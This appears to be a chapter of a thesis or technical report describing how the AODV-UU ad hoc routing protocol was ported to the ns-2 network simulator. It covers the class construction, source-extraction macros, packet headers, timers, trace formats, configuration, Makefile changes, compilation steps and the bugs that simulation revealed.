void recv(Packet *p, Handler *) is the receive method of the AODV-UU routing agent. This method receives all packets that are either destined for the routing agent or should be forwarded. It distinguishes between AODV routing control packets and data packets, and either calls the recvaodvuuPacket() method of the aodv_socket module or the processpacket() method of the packet_input module. After reception of a packet, the timer queue is rescheduled, since it may have changed as an effect of the packet processing performed by AODV-UU.

void packetfailed(Packet *p) will receive packets returned from the link layer, when the link layer finds out that a packet cannot reach its next-hop destination due to communication range limitations or other events hindering the transmission. The usage of this method depends on whether link layer feedback has been enabled (by defining AODVUU_LL_FEEDBACK during compilation) or not. The purpose of this method is to mark failed routes as down, and to drop the failed packet with the DROP_RTR_MAC_CALLBACK reason to indicate that the delivery failed due to errors at the link layer.

void sendpacket(Packet *p, u_int32_t next_hop, double delay) schedules the sending of a packet to the link layer using the supplied next-hop information and the desired delay. If link layer feedback has been enabled, information is added to the packet so that it will be possible to call a link layer callback method of the AODVUU class, link_layer_feedback(), in case a transmission of the packet would fail at the link layer.

int startaodvuuagent() starts the AODV-UU routing agent.
It checks that the routing agent has been initialized properly, sets up the wait-on-reboot timer, schedules the sending of HELLO messages (if link layer feedback is not used), initializes logging, and reschedules the timer queue. This method either returns TCL_OK if the routing agent was started properly, or TCL_ERROR if it failed.

void link_layer_feedback(Packet *p, void *arg) is called when the transmission of a packet fails at the link layer. It calls the packetfailed() method of the supplied AODV-UU routing agent instance with the failed packet as a parameter, allowing the failure to be handled.

gettimeofday() overrides the usual gettimeofday() functionality offered by <sys/time.h>. It is used by the timer_queue module to schedule timeouts and by the debug module for logging events. The value returned by this method corresponds to the current notion of time of the ns-2 scheduler, with each simulation starting at 00:00:00 (GMT) on January 1, 1970. This allows simulations to be performed without the ns-2 real-time scheduler, since the notion of time presented to the AODV-UU routing agent follows that of the simulator.

if_indextoname() overrides the usual if_indextoname() function offered by <net/if.h>. It is used by logging functions of the debug module for finding the name of a network interface, given its interface index.

Source code extraction

The extraction of source code from the original source code files of AODV-UU for inclusion in the AODVUU class is perhaps the most important part of the porting process. It allows the original source code files to remain (almost) unchanged, and the construction of the AODVUU class to be easily performed. It should be noted that the objective of this source code extraction is not to put all source code into a single file. Rather, source code extraction is used for creating the declaration of the AODVUU class. The actual methods of this class remain in their original modules, each yielding an object (.o) file during compilation. These object files are then combined during linking to form the complete AODV-UU routing agent.

Macros

The macros used in the ported version of AODV-UU are listed below. #ifdef MACRO and #ifndef MACRO constructs together with these macros allow code segments to be selectively included or excluded by the preprocessor. The reason for negating some of the macros is that if none of them are defined, AODV-UU should compile as usual, resulting in an AODV-UU routing daemon.

NS_PORT should be defined during the compilation of an AODV-UU routing agent, i.e., during the porting of AODV-UU to ns-2. It is used in .c files for excluding variable initializations (which must instead be performed in the AODVUU constructor) and for excluding #include directives. In the ported version, all .c files will rely on a single header file, aodv-uu.h, for all method and variable declarations.

NS_NO_GLOBALS is used for indicating that global includes and variables, such as standard include files and global variables, should not be part of the compilation. This macro is used in .h files for allowing the AODVUU class to exclude globals during source code extraction.

NS_NO_DECLARATIONS is used for indicating that method declarations should not be part of the compilation. This macro is used in .h files for allowing the AODVUU class to exclude method declarations during source code extraction.

NS_CLASS is used for prepending function definitions in the AODV-UU source code with the name of the AODVUU class.
It expands to AODVUU::, and makes the affected functions members of the AODVUU class.

NS_OUTSIDE_CLASS is used for calling, from within the AODVUU class, global functions whose names collide with methods inside the class. For instance, close() is such a function. If NS_PORT is defined, this macro expands to the :: scope operator of C++.

NS_STATIC is used for removing the static keyword of function definitions. This is done because such functions, hidden from other modules through the static keyword, should not be shared by all instances of the AODVUU class in the ported version. (They will typically refer to non-static data.)

AODV_UU is used in ns-2 source code files for selectively including code segments that only apply to AODV-UU.

Also, some macros are used for other definitions associated with the ported version of AODV-UU:

NS_DEV_NR is the index of the (virtual) network device in the devs array of the current host, i.e., the AODV-UU routing agent. It is set to zero, since only one network device is supported.

NS_IFINDEX is the interface index of the (virtual) network interface. It is set to the same value as NS_DEV_NR, since only one network interface is supported.

AODV_LOG_PATH_PREFIX is used for defining the filename prefix of logfiles generated by AODV-UU routing agents. The default is aodv-uu_.

AODV_LOG_PATH_SUFFIX is used for defining the filename suffix of logfiles generated by AODV-UU routing agents. The default is .log.

AODV_RT_LOG_PATH_PREFIX is similar to AODV_LOG_PATH_PREFIX, but for routing table logfiles. The default is aodv-uu_rt.

AODV_RT_LOG_PATH_SUFFIX is similar to AODV_LOG_PATH_SUFFIX, but for routing table logfiles. The default is .log.

Construction of the AODVUU class

The aodv-uu.h header file of the AODVUU class is organized in the following way (items are listed in order):

A check is made to ensure that NS_PORT has been defined. This indicates that AODV-UU is to be compiled as an ns-2 routing agent.

Header files needed from ns-2 are included. These allow packet types, timer classes, random generators and trace file support to be used.

A forward declaration of the AODVUU class is made. This is needed to be able to reference the class before it has been completely defined. The modules of AODV-UU need to know about the class during the source code extraction, e.g. for declaring member function pointer variables for timers.

Global definitions of AODV-UU are included, i.e., params.h and defs.h. These are needed by all parts of AODV-UU, and are therefore included on a global level.

Global data types, defines and global declarations are selected and extracted from all header (.h) files of AODV-UU. This is done by defining NS_NO_DECLARATIONS, so that no method declarations will be extracted, and by undefining NS_NO_GLOBALS, to ensure that the desired parts of the header files are extracted. #include directives perform the actual source code extraction.

A timer class, TimerQueueTimer, is defined. This class is used for instantiating an ns-2 timer, tqtimer, which serves as a replacement for the select() timer used by the AODV-UU routing daemon. The intention of this timer is to keep track of upcoming events in the timer queue of the timer_queue module.

The AODVUU class is declared. Its public and protected methods are declared. Method declarations from the header (.h) files of AODV-UU are selected by defining NS_NO_GLOBALS and undefining NS_NO_DECLARATIONS, and extracted with #include directives.
For this extraction to work, the macro defined by each header file has to be undefined with #undef AODV_MODULE_H first, since the header file has already been included once before. This is followed by declarations of member variables that were previously global (taken from the main module), or that were static and placed in some of the other modules. The initialization of these variables is performed in the AODVUU constructor.

The ifindex2devindex() method from defs.h is placed below the AODVUU class declaration. It is manually placed there because it needs the AODVUU class declaration to be able to reference member variables of the class. (Otherwise, an extra pass through defs.h would be needed to extract just one method.)

Notes on source code extraction

Obviously, the chosen approach does not entirely rely on automatic source code extraction for the construction of the AODVUU class. Static variables of modules have been manually moved into the class, and their initializations are performed in the constructor. This is a trade-off between automation and the number of passes needed for the preprocessor to extract the source code and put it into the AODVUU class.

Packet types and headers

To allow AODV-UU routing agents to communicate with each other, a special PT_AODVUU packet type and a PacketHeader/AODVUU packet header were added to ns-2. This is in contrast with the AODV-UU routing daemon, which uses UDP for its AODV control packets. The reasons for this decision were the following:

Introduction of a separate packet type allows for easy tracing of packets of this type. No existing trace code has to be modified to suit the specific tracing needs of the packet type; instead, custom-made tracing code may be supplied.

UDP packet processing would complicate the AODV-UU routing agent, since it would require usage or subclassing of the Agent/UDP transport agent. Also, the UDP packet type would offer no significant advantages over a custom-made packet type.

The approach with separate packet types has become a de facto standard in ns-2. A majority of all agents implement their own packet types.

The AODV-UU packet type

An AODV-UU packet type, PT_AODVUU, was added to be able to reference AODV-UU routing control packets in simulations. It was inserted into the packet_t enumeration in ns/common/packet.h. Also, the name of the packet type was set to AODVUU in the constructor of the p_info class. To enable the usage of this packet type in OTcl, its name was added to the protocol enumeration in ns/tcl/lib/ns-packet.tcl.

The AODV-UU packet header

The AODV-UU packet header (PacketHeader/AODVUU) was based on the existing AODV_msg message type of AODV-UU, defined in defs.h. The following additions were made:

A static member variable, offset_, was added. This variable is required by the PacketHeaderManager of ns-2 for storing packet header offsets for each packet header during startup, and can be used for accessing the AODV-UU packet header of packets.

A static inline method, offset(), was added. This method returns the offset mentioned above.

An access method, AODV_msg *access(const Packet *p), was added. This method allows the AODV-UU packet header to be accessed in packets. It is a shorthand for retrieving the packet header offset and accessing the packet using that offset.

A type definition was made, to allow the AODV_msg struct to be referred to as hdr_aodvuu. This is a recommended naming convention of ns-2.

An access macro, HDR_AODVUU(p), was defined. It is a shorthand for calling the access() method of the hdr_aodvuu type to retrieve the AODV-UU packet header of a packet p.
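Taken together, these additions follow the common ns-2 packet header pattern. The sketch below shows how such a header definition might look; the AODV message fields are abbreviated and the exact AODV-UU declarations in defs.h may differ.

// Illustrative sketch following common ns-2 packet header conventions;
// ns-2 headers (e.g. packet.h) are assumed to be included.
struct AODV_msg {
    u_int8_t type;                       // AODV message type (RREQ, RREP, ...)
    /* ... remaining AODV message fields ... */

    static int offset_;                  // filled in by the PacketHeaderManager
    inline static int& offset() { return offset_; }
    inline static AODV_msg* access(const Packet* p) {
        return (AODV_msg*) p->access(offset_);
    }
};
// The offset_ member itself is defined once in a source file:
//     int AODV_msg::offset_;

typedef AODV_msg hdr_aodvuu;             // recommended ns-2 naming convention

// Shorthand macro used throughout the routing agent.
#define HDR_AODVUU(p) (hdr_aodvuu::access(p))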
The packet header was made available to OTcl by creating a static class, AODVUUHeaderClass, and instantiating it as class_rtprotoaodvuu_hdr in aodv-uu.cc. In the constructor of AODVUUHeaderClass, the PacketHeaderClass base class constructor is called both with the desired OTcl class name of the packet header (PacketHeader/AODVUU) and the size of the packet header. This size is set to be the maximum AODV message size, as defined by AODV_MSG_MAX_SIZE in aodv_socket.h. This is to reserve space for the largest AODV message allowed (a RERR message with 100 unreachable destinations).

AODV-UU packet header usage

The AODV-UU packet header, once enabled, is part of all ns-2 packets. Since the size of the packet header is fixed, each packet will carry a constant amount of additional data as a consequence of this. This, however, does not mean that the size of AODV-UU packets will appear as a constant value in trace logs. The amount of meaningful information in a packet of the AODV-UU packet type, plus the size of the IP header, is set in the size_ field of its common header prior to sending the packet. In the same way, the effective AODV-UU packet size is calculated from the size_ field of the common header upon packet reception. The size of the IP header is subtracted from the size_ value, giving the effective AODV-UU packet size. This value can then be used when parsing the information contained in the packet. It should also be noted that no special conversion of the AODV packet data is performed in the ported version of AODV-UU. The data is stored in network byte order, just like in the conventional version of AODV-UU.

6.7.7 Packet buffering and handling

The internal packet buffering of AODV-UU performed in the packet_queue module had to be modified to buffer the actual packets rather than their packet IDs provided by Netfilter, since Netfilter is not available in the ns-2 environment. The required changes were applied to the packet_queue module of AODV-UU. The packet handling of the AODV-UU routing agent is almost identical to that of the AODV-UU routing daemon; the difference is that all packets arrive through the recv() method of the routing agent instead of through different sockets. The packet type is analyzed in the recv() method, after which the correct handler method (recvaodvuuPacket() of the aodv_socket module or processpacket() of the packet_input module) is called.

Addressing

The addressing in AODV-UU assumes a 32-bit unsigned integer value, representing the IP address. The ns-2 addressing scheme uses signed 32-bit integers for its node IDs, as described in section . However, this does not pose any specific problems for the AODV-UU routing agent. Nodes are never assigned negative node IDs, so the routing agent can safely type cast its node ID into an IP address. The IP address is stored in the structure for network device information of AODV-UU, and is used e.g. for setting the source address when sending packets.

Timers

The existing timer queue module of AODV-UU, timer_queue, was kept intact in the ported version. To replace the select() timer used by the AODV-UU routing daemon, a special timer subclass of the TimerHandler class was constructed, TimerQueueTimer, and instantiated as tqtimer by the AODV-UU routing agent. Furthermore, the TimerQueueTimer class was made a friend of the AODVUU class, so that it can access methods of AODVUU when the timer expires.
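A minimal sketch of what such a timer subclass might look like is given below. The class and method names follow those used in this chapter, but the body of expire() is an illustrative assumption rather than the actual implementation.

// Illustrative sketch of the timer replacing the select() timeout.
class AODVUU;   // forward declaration; the full class is declared in aodv-uu.h

class TimerQueueTimer : public TimerHandler {
public:
    TimerQueueTimer(AODVUU *a) : TimerHandler(), agent_(a) {}
protected:
    virtual void expire(Event *e);      // defined after the AODVUU class
    AODVUU *agent_;
};

// Defined once the AODVUU class has been fully declared:
void TimerQueueTimer::expire(Event *)
{
    // Process expired entries in the agent's timer queue, then reschedule
    // this timer for the next upcoming event.  Access to these methods is
    // possible because TimerQueueTimer is a friend of the AODVUU class.
    agent_->timer_age_queue();
    agent_->schedulenextevent();
}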
(Details on timers are available in section 5.12.) The tqtimer timer is kept synchronized with the timeout of the next upcoming event of the timer queue in the timer_queue module. When it expires, it calls the timer_age_queue() method of the timer_queue module. This method checks for any expired timeouts, executes any corresponding events, and returns the new timeout of the timer queue. This value is used for rescheduling the tqtimer timer, to once again synchronize it with the timer queue. It should be noted that it is the responsibility of the programmer to make sure that this timer synchronization is performed, by calling the schedulenextevent() method of the AODVUU class whenever it is possible that the timer queue has changed. However, the timer queue can only change during the processing of an AODV message, or as a side-effect of expired timers, so it is rather easy to enforce this policy.

Finally, a comment should be made regarding the calling of timer handler functions. The AODV-UU routing agent required the calls to timer handler functions (and the setting of timer handler functions when creating timers) to be modified. This was because of the instantiation of routing agents; each such handler function is associated with a certain routing agent instance. Therefore, references to timer handler functions were made instance-aware by utilizing the NS_CLASS macro and this pointers, pointing to the current routing agent instance. This can be seen in the modified source code of AODV-UU wherever a timer handler method is assigned or called. Details on function pointers in C++ are available in [53].

Logging

The logging portions of the AODV-UU debug module were slightly modified to allow for the instantiation of routing agents. Filename prefixes and suffixes for general logfiles and routing table logfiles were added to defs.h. The log_init() function of the debug module was modified to construct filenames for logfiles from these prefixes, suffixes and the IP address of the routing agent (i.e., the node). The resulting filenames could e.g. be aodv-uu_ log and aodv-uu_rt_ log for a node with IP address (which is equal to a node ID of 1). This way, each routing agent writes log information to a unique set of logfiles. In addition, the IP address of the agent was added to each line in the general logfile to increase clarity.

Tracing

Tracing support for the AODV-UU packet type was added using the tracing source code of the existing AODV routing agent in ns-2 as a template. The tracing source code is available in ns/trace/cmu-trace.{cc,h}. It was decided that the trace format should be equal to that of the existing AODV routing agent, to easily let users switch between the two implementations. The only difference in the tracing of AODV-UU packets is that the packet type field of the ns-2 trace log will read AODVUU instead of AODV. Finally, to perform this tracing, a conversion of the fields in the AODV-UU packet header was needed, since these are stored in network byte order but should be displayed in host byte order. The AODV-UU routing agent supports the old and the new trace format of ns-2, but not the tagged format. (Details on these formats are available in section .) In the following subsections, examples of the two supported formats are given for each possible AODV message type, and the fields relevant to AODV are explained.
RREP and HELLO messages

s _1_ RTR AODVUU 40 [ ] [1:255 0: ] [0x2 0 [1 0] ] (REPLY)
(1)(2)(3) (5) (4)

s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 40 -If 0 -Ii 24 -Iv 255 -P aodvuu -Pt 0x2 -Ph 0 -Pd 1 (1) (2) (3) -Pds 0 -Pl Pc REPLY (4) (5)

s _0_ RTR AODVUU 40 [ ] [0:255-1: ] [0x2 0 [0 5] ] (HELLO)
(1)(2)(3) (5) (4)

s -t Hs 0 -Hd -2 -Ni 0 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 40 -If 0 -Ii 6 -Iv 1 -P aodvuu -Pt 0x2 -Ph 0 -Pd 0 (1) (2) (3) -Pds 5 -Pl Pc HELLO (4) (5)

(1): Packet type. 0x2 = RREP.
(2): Hop Count.
(3): Destination IP Address (i.e., the node ID).
(4): Destination Sequence Number.
(5): Lifetime.

It should be noted that since HELLO messages are RREP messages, the packet type (1) is 0x2 for HELLO messages as well.

RREQ messages

s _0_ RTR AODVUU 44 [ ] [0:255-1: ] [0x1 0 0 [2 0] [0 1]] (REQUEST)
(1)(2) (4) (6) (3) (5) (7)

s -t Hs 0 -Hd -2 -Ni 0 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 44 -If 0 -Ii 1 -Iv 1 -P aodvuu -Pt 0x1 -Ph 0 -Pb 0 -Pd 2 (1) (2) (3) (4) -Pds 0 -Ps 0 -Pss 1 -Pc REQUEST (5) (6) (7)

(1): Packet type. 0x1 = RREQ.
(2): Hop Count.
(3): RREQ ID.
(4): Destination IP Address (i.e., the destination node ID).
(5): Destination Sequence Number.
(6): Originator IP Address (i.e., the originator node ID).
(7): Originator Sequence Number.

RERR messages

s _1_ RTR AODVUU 32 [ ] [1:255 0: ] [0x3 1 [2 3] ] (ERROR)
(1)(2)(3) (5) (4)

s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 32 -If 0 -Ii Iv 1 -P aodvuu -Pt 0x3 -Ph 1 -Pd 2 (1) (2) (3) -Pds 3 -Pl Pc ERROR (4) (5)

(1): Packet type. 0x3 = RERR.
(2): DestCount.
(3): Unreachable Destination IP Address 1 (i.e., the node ID).
(4): Unreachable Destination Sequence Number 1.
(5): Lifetime.

It should be noted that a lifetime field is not part of the RERR message. However, this field was logged by the AODV routing agent supplied with ns-2, because it handles several message types equally when logging them. The value of this field was always 0.0 because it was never initialized. For backward compatibility with the AODV trace log format, it is included in AODV-UU trace logs as well (always displaying a value of 0.0).

RREP-ACK messages

Currently, AODV-UU does not utilize RREP-ACK messages since local repair has not been implemented yet. However, tracing support is in place. For RREP-ACKs, a line in the trace log would end in the following way:

... [0x4] (RREP-ACK)
(1)

... -P aodvuu -Pt 0x4 RREP-ACK
(1)

(1): Packet type. 0x4 = RREP-ACK.

It should be noted that RREP-ACK messages are not logged at all by the AODV routing agent supplied with ns-2, possibly because of the old version of the AODV draft (version 6) that it adheres to.

Excluded features and modules

The non-applicable features of AODV-UU in ns-2 simulations have been reviewed in section . These features were made unavailable in the ported version of AODV-UU by not binding the corresponding configuration variables to the OTcl environment, and enforcing their values in the constructor of the AODVUU class. Since the AODV-UU routing agent does not perform any kernel interaction or ICMP message sending, the kaodv, k_route, libipq and icmp modules were not used. Calls to functions of these modules were excluded using #ifndef NS_PORT directives in the source code.

Configuration and usage

Configuration of the AODV-UU routing agent is done by changing the values of its instance variables.
The available instance variables are described below.

unidir_hack_ determines whether uni-directional links should be detected and avoided.

rreq_gratuitous_ determines whether the gratuitous RREP flag should be set in RREQs. This flag is described in section .

expanding_ring_search_ determines whether expanding ring search should be used for RREQs.

receive_n_hellos_ requires that a certain number of HELLO messages should be received from a node before it is treated as a neighbor. If used, it should be set to a value greater than or equal to 2.

hello_jittering_ determines whether jittering of HELLO messages should be used.

wait_on_reboot_ determines whether a 15-second wait-on-reboot delay should be used on startup.

log_to_file_ determines whether a general logfile should be created.

debug_ determines whether the events of the general logfile should be printed to the console (stdout).

rt_log_interval_ determines the interval between loggings of the internal routing table of the AODV-UU routing agent. The value is specified in milliseconds, and a value of 0 disables routing table logging.

In general, a value of 0 disables an option and a value of 1 enables it. No checking of the values is performed; it is the responsibility of the user to specify sensible values.

Default configuration

The default configuration of the AODV-UU routing agent is shown in Table 6.1. The setting of these values is performed in ns/tcl/lib/ns-default.tcl. It should be noted that the HELLO jittering and wait-on-reboot settings differ from the default settings of the conventional AODV-UU routing daemon; the reason for this is that the AODV-UU routing agent applies a certain amount of jittering to all broadcast packets, and that a wait-on-reboot phase would be purely superfluous in simulations.

Table 6.1: AODV-UU routing agent default configuration

Variable                   Default value   Meaning
unidir_hack_               0               Off
rreq_gratuitous_           0               Gratuitous flag not set
expanding_ring_search_     1               Uses expanding ring search
receive_n_hellos_          0               Off
hello_jittering_           0               No HELLO jittering
wait_on_reboot_            0               No wait-on-reboot
debug_                     0               No general logging to stdout
rt_log_interval_           0               No routing table logging
log_to_file_               0               No general logging to logfile

Usage

Changing of the AODV-UU routing agent configuration options should be performed in the simulation scenario script before the simulation is started with the run command of the simulator instance. This is preferably done during node creation, as shown below. Also, for the AODV-UU routing agent to be used in a simulation, the -adhocRouting option of the node-config command of the simulator instance should be set to AODVUU.

...
$ns_ node-config -adhocRouting AODVUU
for {set i 0} {$i < $val(nn) } {incr i} {
    set node_($i) [$ns_ node]
    $node_($i) random-motion 0       ;# disable random motion
    set r [$node_($i) set ragent_]   ;# get the routing agent
    $r set debug_ 1
    $r set rt_log_interval_ 1000
    $r set log_to_file_ 1
}
...

Note how the routing agent is fetched from the mobile node; it is referenced by the ragent_ instance variable of the node. After the routing agent instance has been retrieved, the values of its instance variables can be changed as desired.

Compile-time configuration

The AODV-UU routing agent can also be set to either use link layer feedback or to use HELLO messages. This is determined during compilation, and is described in section .

Extending the AODV-UU routing agent

Because of the modular construction of the AODVUU class, it is easy to extend the AODV-UU routing agent whenever new modules are added to AODV-UU.
The necessary steps are described below. It is assumed that the module to be added is written in C, but some of the steps apply to C++ modules as well.

Module construction

In its .c file, the module should only include aodv-uu.h if NS_PORT is defined, not any other modules. Standard includes are an exception; they are allowed regardless of the NS_PORT definition. All functions of the module should be prepended with the NS_CLASS macro, to make them member methods of the AODVUU class.

In its .h file, the module should group standard includes and global datatypes using the NS_NO_GLOBALS macro. Such code segments should be included by the preprocessor if this macro is not set. Also, the module should group its function declarations using the NS_NO_DECLARATIONS macro. Such declarations should be included by the preprocessor if this macro is not set.

Module addition

The module should be added to either the SRC_NS or the SRC_NS_CPP variable of the AODV-UU Makefile (described in section ), depending on whether the module is written in C or C++.

The header file of the module should be added outside the AODVUU class in aodv-uu.h, to extract global data types, defines and global declarations. During this extraction, the NS_NO_GLOBALS macro should be undefined, and NS_NO_DECLARATIONS defined.

The module should be included inside the AODVUU class, to extract method declarations. This requires the macro defined by that module (e.g. AODV_MODULE_H) to be undefined with #undef AODV_MODULE_H first, since parts of the module were already included on a global level, and hence, the macro was defined. During this extraction, the NS_NO_GLOBALS macro should be defined and NS_NO_DECLARATIONS undefined.

Module compilation

No extra steps are necessary for the compilation. Since the module was added to the AODV-UU Makefile, it will automatically become a part of the AODV-UU routing agent in ns-2.

General C vs C++ issues

During the porting process, a number of conversion issues were encountered and had to be fixed in the original source code. These issues were merely a result of the slightly fuzzy semantics of the C programming language (compared to C++), and most of them were only warnings. A detailed reference on C vs C++ issues can be found in [51].

Structs in C++ are classes. As such, their names should appear before the opening curly bracket, and the class definition should end with a semicolon following the closing curly bracket. This was achieved by using #ifdef NS_PORT directives, modifying the definition of the struct as needed.

The C++ compiler complained about several implicit type casts. This was solved by performing explicit type casts, after ensuring that these type casts would not affect the functionality of AODV-UU in an unexpected way. The most common instances of this issue were implicit type casts of void * pointers from malloc() calls.

The C++ compiler did not allow the AODVUU class name to be part of the timer handler typedef in timer_queue.h. To solve this, the complete typedef was manually entered for the handler field of the timer struct.

Initializations of member variables are not allowed inside the definition of a class. This required the variables that were moved from the different modules into the AODVUU class to be initialized in the constructor of the AODVUU class instead.
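The malloc() issue in particular is easy to illustrate. In C, the void * returned by malloc() is converted to the target pointer type implicitly, whereas a C++ compiler requires an explicit cast; the structure name used below is hypothetical and not taken from the AODV-UU source code.

#include <stdlib.h>

struct example_entry { int dummy; };   /* hypothetical structure */

void example(void)
{
    /* Accepted by a C compiler, but rejected by a C++ compiler, because
     * the void * returned by malloc() would be converted implicitly:
     *
     *     struct example_entry *e = malloc(sizeof(struct example_entry));
     *
     * The explicit cast added during the porting is valid in both languages: */
    struct example_entry *e =
        (struct example_entry *) malloc(sizeof(struct example_entry));
    free(e);
}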
In general, the original AODV-UU source code did not cause very much trouble during the porting process. This can be seen as an indication of good software development and good adherence to the ISO C standard.

Platform portability issues

During the porting process, the platform portability of the AODV-UU routing agent was investigated. AODV-UU relies on a Linux environment for its network-related datatypes, e.g. those defined by <netinet/in.h> and <net/if.h>. This causes problems when AODV-UU is to be compiled on other platforms, since the definitions contained in these files differ between platforms. Another large problem is the lack of an endian.h header file on most non-Linux platforms. This file determines how multi-byte values are stored in memory, which depends on the architecture of the machine. A prototype solution for this problem, a simple endian.c program generating an endian.h file (which could then be included during compilation), was tried and found to work satisfactorily. The source code of this program is available from [55]. However, it should be noted that this approach does not always work for cross-compilation, where compilation is performed on a machine whose architecture is different from that of the target machine. Attempts were made to compile the AODV-UU routing agent on an UltraSPARC machine running Sun Solaris 8. The endian problem was solved using the endian.c program, but the compilation failed due to problems with the network-related datatypes used by AODV-UU. More research needs to be done in this area for AODV-UU to become portable to other platforms than the Linux platform.

Miscellaneous source code changes

In the previous sections, a number of changes and additions to the existing AODV-UU and ns-2 source code have been described. In addition to those, the following modifications were made:

A create-aodvuu-agent instance procedure, similar to the existing create-aodv-agent instance procedure, was added to the Simulator OTcl class in ns/tcl/lib/ns-lib.tcl. This procedure creates and installs an AODV-UU routing agent in a node.

The PT_AODVUU packet type was added to the recv() method of the PriQueue class in ns/queue/priqueue.cc, to allow AODV-UU routing control packets to be prioritized when a Queue/DropTail/PriQueue priority queue is used. Also, the PT_AODVUU packet type was added to the prq_assign_queue() method to classify AODV-UU packets as routing protocol packets.

AODVUU was added as a possible routing agent choice in the create-wireless-node instance procedure in ns/tcl/lib/ns-lib.tcl. The choice of AODV-UU as the routing agent results in a call to the create-aodvuu-agent instance procedure, described earlier.

An init instance procedure of the Agent/AODVUU class in OTcl was added to ns/tcl/lib/ns-agent.tcl. The purpose of this procedure is to supply the routing agent with OTcl commands during initialization.

The call to random() for HELLO message jittering in the aodv_hello module was replaced with a call to the Random::integer() method of ns-2, using an #ifdef NS_PORT directive. The reason for this is that random() is not portable, and therefore, the built-in random generator of ns-2 must be used instead.

The routing table logging in print_rt_table() of the debug module was modified to flush its output after printing each line.
Otherwise the line buffer could overflow, resulting in a segmentation fault during large simulations (with a large number of precursors appearing in the routing table).

Locating source code changes

The changes made to the original AODV-UU and ns-2 source code during the porting are easy to locate, because of the macros used for the selective compilation of the AODV-UU routing agent, and the comments provided where changes have been made. In the ns-2 source code, the changes have been marked with AODV-UU: comments and the usage of the NS_PORT and AODV_UU macros. In the AODV-UU source code, the changes have been marked with NS_PORT: comments and the usage of the NS_PORT macro.

The AODV-UU Makefile

The AODV-UU Makefile handles the compilation of the AODV-UU routing agent (as well as the compilation of the AODV-UU routing daemon). It is called from the Makefile of ns-2 with suitable parameters, allowing the compilation to be performed as if the AODV-UU routing agent had been compiled directly from the ns-2 Makefile. It should be noted that the AODV-UU routing agent cannot be compiled manually using only the AODV-UU Makefile; the compilation needs the aforementioned parameters supplied by the ns-2 Makefile. The reason for this split compilation is that ns-2 assumes all source code to be .cc files, not .c files as is the case with most modules of AODV-UU. By letting the AODV-UU Makefile handle compilation of the AODV-UU routing agent, this problem was circumvented.

Routing agent packaging

The AODV-UU routing agent is packaged as a library, libaodvuu, during compilation. For this, the ar archiver utility is used. The libaodvuu library contains all object files of AODV-UU (one per module), and can be included during linking of ns-2. This approach was chosen to minimize the changes required to the ns-2 Makefile.

Configuration options

To configure the AODV-UU routing agent to use link layer feedback instead of HELLO messages, the AODVUU_LL_FEEDBACK macro should be defined. This is done using the EXTRA_NS_DEFS variable in the AODV-UU Makefile.

Integrating AODV-UU with ns-2

In the following subsections, the compilation issues associated with the integration of the AODV-UU routing agent into ns-2 are described.

Makefile modifications

The ns-2 Makefile is generated by the configure utility of the system during installation, using Makefile.in as a template. Therefore, the changes needed for compiling ns-2 with AODV-UU support were added to Makefile.in rather than to a Makefile. These changes are listed below.

An AODV_UU_DIR variable was defined, specifying where the directory with the AODV-UU source code is located, relative to the ns-2 directory, ns/. The value of this variable was set to aodv-uu, indicating that the AODV-UU source code directory should be ns/aodv-uu.

The DEFINE variable was changed to include -DAODV_UU and -DNS_PORT, the macros needed for specifying that AODV-UU support should be added in the ns-2 source code and that AODV-UU should be compiled as an ns-2 routing agent.

The LIB variable was changed to include the AODV-UU directory in the library path, and the libaodvuu library. This ensures that the AODV-UU routing agent is included during the linking process.

A phony aodv-uu target was added, so that the AODV-UU routing agent will be compiled (i.e., the AODV-UU Makefile is called) each time ns-2 is compiled.
Three variables are passed from the ns-2 Makefile to the AODV-UU Makefile during compilation: NS_DEFS (the defines used by the ns-2 Makefile), OPTS (the compiler options used by the ns-2 Makefile) and NS_INC (specifying the absolute path to the ns-2 directory). These are used by the AODV-UU Makefile to compile the AODV-UU routing agent as if it had been compiled directly from the ns-2 Makefile.

A phony aodv-uu-clean target was added to allow cleaning of compiled files in the AODV-UU directory to be performed from the ns-2 Makefile. This target switches to the AODV-UU directory and issues make clean there, i.e., the actual cleaning is performed by the AODV-UU Makefile. The aodv-uu-clean target was also added as the first dependency of the existing clean target, so that the AODV-UU directory is cleaned whenever make clean is issued in the ns-2 directory.

The aodv-uu target was added as the first dependency of the ns target, so that AODV-UU is compiled whenever ns-2 is compiled.

Distribution of modifications

It was decided that all changes made to the original ns-2 source code during the porting of AODV-UU should be distributed as a patch, which can be applied to a fresh copy of ns-2 using the patch utility of the system. This eliminates the need for manually replacing or modifying files in the ns-2 source code tree when AODV-UU support is to be installed, e.g. by an end user.

Compilation instructions

Compilation of the AODV-UU routing agent is very straightforward. The required steps are described below.

A fresh copy of ns-2, version 2.1b9, is needed. It should be unpacked and installed on the target system, e.g. into a ns/ directory.

A directory containing all the AODV-UU files should be created as aodv-uu below the ns-2 directory, i.e., as ns/aodv-uu. Any desired changes to the AODV-UU Makefile should be made (see section ).

The ns-2 source code tree should be patched, using the patch supplied with AODV-UU:

cd ~ns/
patch -p1 < aodv-uu/ns-2.1b9-aodv-uu-0.5.patch

This introduces all necessary changes to the ns-2 source code tree for AODV-UU to be supported.

Finally, ns-2 should be re-compiled. The following sequence of commands is recommended to ensure that all portions of ns-2 are re-compiled:

cd ~ns/
./configure
make distclean
./configure
make

After successful compilation, the AODV-UU routing agent can be used as described in section .

Bugs found by simulation

During initial testing of the AODV-UU routing agent, some bugs in AODV-UU were found and corrected. One of the most serious bugs encountered was a log buffer overflow in the debug module, causing the simulator to crash with a segmentation fault when a large simulation was conducted and routing table logging had been enabled. It turned out that a large number of precursors appearing in the routing table caused the program to write log data outside its log buffer. This bug was solved by flushing the routing table log after each line. Simulations also revealed a bug in the processing of AODV messages, where the reception of a message could cause buffered packets to be scheduled for transmission even though an active route to the destination did not exist. This led to repeated buffering and un-buffering of packets. Finally, errors related to RERR processing were found and corrected by the author of AODV-UU. It was concluded that the simulations helped find obscure bugs that probably would not have been found otherwise.

6.9 Future work

